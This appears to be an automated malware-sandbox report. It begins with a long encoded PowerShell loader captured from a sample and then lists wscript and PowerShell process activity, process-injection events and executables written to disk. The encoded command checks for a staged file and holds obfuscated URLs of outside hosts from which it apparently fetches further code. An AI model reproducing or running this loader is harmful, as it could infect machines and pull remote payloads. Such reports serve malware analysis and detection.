ABrAEEATABnAEEAeABBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQQA9AD0AQQBqAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE4AZwBBADUAQQBDADQAQQBOAGcAQQAwAEEAQQA9AD0AQQBqAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAG8AQQBIAFUAQQBjAHcAQgByAEEARwBrAEEAWgBRAEIAegBBAEUAVQBBAGUAUQBCAGwAQQBHAEkAQQBiAEEAQgBwAEEARwA0AEEAYQB3AEEAdQBBAEcAdwBBAGEAUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbgBvAG4AaQBuAHQAZQBsAGwAaQBnAGUAbgBjAGUALgBOAG8AbgBhAGMAaQBkACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAyADIANQAzADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHADQAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBaAHcAQgBsAEEARwA0AEEAWQB3AEIAbABBAEMANABBAFQAZwBCAHYAQQBHADQAQQBZAFEAQgBqAEEARwBrAEEAWgBBAEEAcwBBAEgAWQBBAGEAUQBCAHcAQQBIAE0AQQBPAHcAQgB6AEEARwB3AEEAWQBRAEIAagBBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA9ACIAOwAkAG8AdQB0AGYAaQB0AHQAZQByAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE4AQQBBADQAQQBDADQAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAYwBhAG0AZQByAGEAbABpAHMAdABpAGMASAB5AGQAcgBvAGMAeQBhAG4AaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAHcAQQB1AEEARABJAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBEAE0AQQBMAGcAQQA0AEEARABZAEEAIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABjAHUAbgBjAHQAYQB0AGkAbwBuAEYAdQByAHIAaQBuAGcAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAEkAQQBNAEEAQQA0AEEAQwA0AEEATQBRAEEAeABBAEQATQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9ACIAOwAkAE4AaQB0AHIAbwBwAGEAcgBhAGYAZgBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBZAFEAQgB6AEEASABRAEEAWgBRAEIAawBBAEMANABBAGIAUQBCAGgAQQBHADQAQQBZAFEAQgBuAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAD0AIgA7ACQAYQBuAHQAaQBjAGEAbgBjAGUAcgBvAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBADEAQQBDADQAQQBNAFEAQQA1AEEARABBAEEATABnAEEANQBBAEQARQBBAEwAZwBBADUAQQBEAFEAQQB2AEIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYgB3AEIAegBBAEcAMABBAGIAdwBCAHkAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAWgBRAEIAdQBBAEEAPQA9AHYAQgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAHcAQQBhAFEAQgBuAEEASABVAEEAYgBBAEIAaABBAEgASQBBAEwAZwBCAGgAQQBIAEkAQQBZAHcAQgBvAEEARwBrAEEAdgBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEcASQBBAGQAQQBCADEAQQBIAE0AQQBhAFEAQgBtAEEARwA4AEEAYgBBAEIAcABBAEcAOABBAGQAUQBCAHoAQQBDADQAQQBZAGcAQgBwAEEARwBzAEEAWgBRAEEAPQAiADsAfQB9ACQAbwB4AGYAbwByAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFEAQQBhAFEAQgB6AEEASABBAEEAWgBRAEIAdQBBAEgATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARwBFAEEAYgBBAEEAdQBBAEcASQBBAGQAUQBCAHoAQQBHAGsAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAHkAQQBIAFUAQQBiAFEAQgB3AEEARwBVAEEAZABBAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBlAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAdwBBAEEAPQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEASABVAEEAWQBRAEIAdQBBAEgAawBBAGIAQQBCAEMAQQBHAHcAQQBiAHcAQgB2AEEARwBRAEEAZQBRAEEAdQBBAEcAYwBBAGQAUQBCAHAAQQBHAFEAQQBaAFEAQQA9ACIAOwAkAGwAZQBlAHIAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAHcAQQB4AEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABjAEEATgBRAEEAPQBYAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AWABSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE0AUQBBAHUAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQA9ACIAOwA="
parent_process	wscript.exe	martian_process	wscript "C:\ProgramData\submatrixPunditries.js" UnderfleeceDeathsman Dentale
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\ProgramData\submatrixPunditries.js" UnderfleeceDeathsman Dentale

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3052 resumed a thread in remote process 2312
Process injection	Process 2312 resumed a thread in remote process 2492
NtResumeThread May 23, 2023, 9:37 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 2312	1	0	0
NtResumeThread May 23, 2023, 9:37 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2492	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Clji.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All